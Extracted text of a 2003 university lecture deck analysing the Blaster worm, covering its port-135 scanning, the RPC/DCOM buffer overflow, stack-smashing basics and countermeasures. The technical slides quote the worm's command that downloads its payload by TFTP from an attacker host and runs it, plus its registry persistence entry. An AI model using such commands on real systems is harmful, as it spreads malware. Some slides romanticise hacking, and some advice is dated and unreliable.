Post on 19-Dec-2015
Analysis of the Internet Worm of August 2003
INFORMATION AND COMPUTER SCIENCE DEPARTMENT
Dr. K. Salah
September 2003
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Agenda
• Reasons for Talk
• Some Jargon
• Ethics of Hackers
• Why Can’t Our Kids Hack?
• Example of Hacker Attacks
• W32 Blaster Worm
• Smashing the Stack for Fun and Profit
• More Information
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Reasons of Talk
• Know Your Enemy!– Prophet of Islam says, “ مكرهم أمن قوم لغة تعلم ” من– “Know your enemy and know yourself and you can fight a hundred
battles without disaster,” Sun Tzu.
• Knowledge is power!– Understand hack tactics, strategies, and tricks.
– Be better prepared
– Design and write better code
– Take countermeasures.
• Know something about the ethics of hackers
• Testify how smart the hackers are!
• Research
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Some Jargon
• Hoax vs. Worm vs. Virus
• Trojan Horse
• Crackers vs. Hackers vs. Intruder
• DOS attack
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
The Hacker Ethic
• Hackers have ethics, according to Socrates.
• "The Hacker Ethic", by Pekka Himanen, Linus Torvalds, and Manuel Castells.– Translated into 15 languages– Hackers are the warriors, explorers, guerrillas, and joyous adventurers
of the Digital Age, and the true architects of the new economy. Demonized and often misunderstood, they are changing the world and the way it works.
– Hackers are curious and often smart. They might not agree with a law, or offer a different interpretation, or act in ways the law doesn't cover.
– http://www.hackerethic.org
– http://www.ils.unc.edu/gbnewby/ethics/index.html
• Why hacking?• Enjoy the challenge and excitement
• Joy, fun, ego, and recognition
• Hate Microsoft products and practices
– The battle with google.com has started
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Hacker Ethics
• Information should be free– Driving Linux/Apache and Open Source Code– Technology is only good if you get other people join you developing and using it.
Info should always be disclosed.– Not all people can afford to buy software or information– No cocern for copyright laws/abuses, intellectual property, passwords, data
security!
• Hacking is essential to show security holes and vulnerabilities – So many hackers are security gurus– A way to make living and learn about computers
• Hackers are not doing real harm– Pushing technology to its knees– “We are just curious and inquistitve people… we want to chart
new territory and look around,” Craig Neidorf– Craig Neidorf is the founder of Phrack Magazine and member of the 2600 club. His
email is route@underground.org
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Kids and Hacking
• Kids are very curious, thus are hackers.
• Have much more time, less responsibilities!
• They look for recognition and fun
• Usually kids fall victims and get caught first
• Originators of attacks are yet to be found
• What does it really take to be a hacker?– Some knowledge of C and Assembly programming
– Some knowledge of OS
– Some knowledge of Networking (TCP/IP)
– (Beware!!! These are our ICS and COE students!!!)
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Kids and Hacking
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Kids and Hacking
Connected to www.test.com
www.test.com
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Kids and Hacking
• Shall we give up hope?– The 1998 registrar incident
• So, why can’t Our kids hack?– Digital Divide
– English
– Busy and distracted….
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Fun, Attacks, or Damages
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Fun, Attacks, or Damages
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Fun, Attacks, or Damages
August 17, 1996
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Fun, Attacks, or Damages
August 14, 2003
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Fun, Attacks, or Damages
August 14, 2003
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
The Blaster Worm
• Affected Windows XP and Windows 2000
• Causes Windows NT to crash when trying to exploit NT machines
• Has so many variants: Blaster-A, Blaster-B, …Blaster-F – Blaster-F was linked to a Romanian student
• This is a worm, not a virus. Eating up network bandwidth.
• Encouraged other hackers to release other worms: Sobig, Welchia, etc.
• Microsoft called it, “A security issue has been identified…”
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Technical Details
1) An infected system scans the network for any computer listening to TCP port 135 (Windows RPC/DCOM port).
– TCP port 135 used for Microsoft Active Directory and Microsoft Exchange mail servers, among other things.
– “The Art of Port Scanning” by fyodor@dhp.com Phrack Magazine, http://www.phrack.org/show.php?p=51&a=11
135 ?
135 ?
135 ?
InfectedHost
TargetHost
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Technical Details
2) The infected system attempts to exploit the RPC buffer overflow on those systems listening to TCP port 135.
– Buffer Overflow Attack will be explained later
InfectedHost
TargetHost
RPC Buffer Overflow
Listen on TCP port 44441354444
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Technical Details
3) The buffer overflow includes code which causes the victim to open a cmd.exe shell (an egg) and cause it to (hatch):
– starts a TFTP session with the attacker between ports 4444 and 69 to download a copy of the worm “msblast.exe”
– Inside the shell code, do a command: “cmd \c tftp –i appaddress worm.exe & worm.exe & exit”
– “msblast.exe” is packed with UPX compression utility, self-extracting and is 11KB once unpacked.
InfectedHost
TargetHost
69 )1( tftp attackerIP GET msblast.exe
2( ) msblast.exe gets downloaded3( ) execute worm.exe
1354444
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Technical Details
4) “msblast.exe” gets executed and starts the scanning process for those computers listening on TCP port 135.
– A text string in the worm code reads, “I just want to say LOVE YOU SAN!! Billy gates why do you make this possible? Stop making money and fix your software!!”
– The code creates a mutex called “BILLY” to avoid running multiple times.
– It also adds an entry to always run on Windows restartSOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows auto update = "msblast.exe“
135?
135?
135?
InfectedHost
135?
135?
InfectedHost
135?
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Technical Details
• A secondary payload in the worm is supposedly to cause all infected systems to launch a DOS attack against MS windowsupdate.com website on 16August 2003.– Why August 16?
– Any relation to the DOJ Hack?
• If the worm cannot find a DNS entry for windowsupdate.com, it uses 255.255.255.255, causing broadcast traffic and flooding the network.
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Buffer Overflow Attack
• First Rule of Hacking: Do everything you are not supposed to?– If you can’t change the flow of execution, crash it!
• Started with Robert Morris worm in 1988 exploiting a buffer overflow vulnerability in fingerd.
• Code Red worm of 2001, exploiting a buffer overflow vulnerability in Mircosoft IIS (Internet Information Server).
• The new MS Blaster of 2003, exploiting a buffer overflow vulnerability in MS DCOM/RPC.
• The next attack will be most likely linked to buffer overflow
CERT Security Alert by Years– upto the first 2 months of 2002
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Buffer Overflow Attack
• Best article on the know-how details of the buffer overflow can be found in Phrack Magazine (issue 49) titled, published in 1996:http://www.phrack.org/show.php?p=49&a=14
“Smashing the Stack for Fun and Profit,”
by AlephOne@underground.org
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Buffer Overflow Attack
c = 3
b = 2
a = 1
ret address
sfp
buffer [5]
buffer [10]
Buf
fer
grow
s do
wnw
ard
Sta
ck g
row
s up
war
dBottom of stackTop of memory
Top of stackBottom of memory
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Buffer Overflow Attack
*str
ret address
sfp
buffer [16]
Bottom of stackTop of memory
Top of stackBottom of memory
Sta
ck g
row
s up
war
d
Bu
ffer
grow
s do
wnw
ard
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Buffer Overflow Attack
Partial List of Unsafe Functions in the Standard C Library:
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Buffer Overflow Attack Countermeasures
• Validate all arguments or parameters received whenever you write a function.– Bounds checking
– Performance is compromised!!
• Use secure functions instead, e.g., strncpy() and strncat()• Use safe compilers
– Watch out for free compilers!!! Can be made by hackers, for hackers!
• Test your code thoroughly
• Keep applying patches
• Good site for advisory is CERT at Carnegie Mellon SWE Institute– http://www.cert.org/advisories
Can this attack be ever eliminated?Can this attack be ever eliminated?
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
R e s e a r c hR e s e a r c h on Protecting the Stack
• Good number of references is found in:– http://www.crhc.uiuc.edu/EASY/Papers02/EASY02-xu.pdf
• How? – Splitting control stack from data stack
• Control stack contains return addresses
• Data stack contains local variables and passed parameters
– Use middleware software (libsafe) to intercept calls to libray functions known to be vulnerable.
– Using StackGuard and StackShield• Adding more code at the beginning and end of each function
• Check to see if ret address is altered and signal a violation
– Others
– Performance due to overhead is always as issue!
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
The Adventure Continues
• Bypassing the fix for smashing the stack
– Crispin Cowan, Steve Beattie, Ryan Finnin Day, Calton Pu, Perry Wagle and Erik Walthinsen. Protecting Systems from Stack Smashing Attacks with StackGuard
• http://www.immunix.org/documentation.html
– In May 2000 issue of Phrack Magazine (www.phrack.org)• “Bypassing StackGuard and StackShield” by Bulba and Kil3r <lam3rz@hert.org>
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Curious about More Hacking Techniques
Compulsory Reading"Hacking Exposed"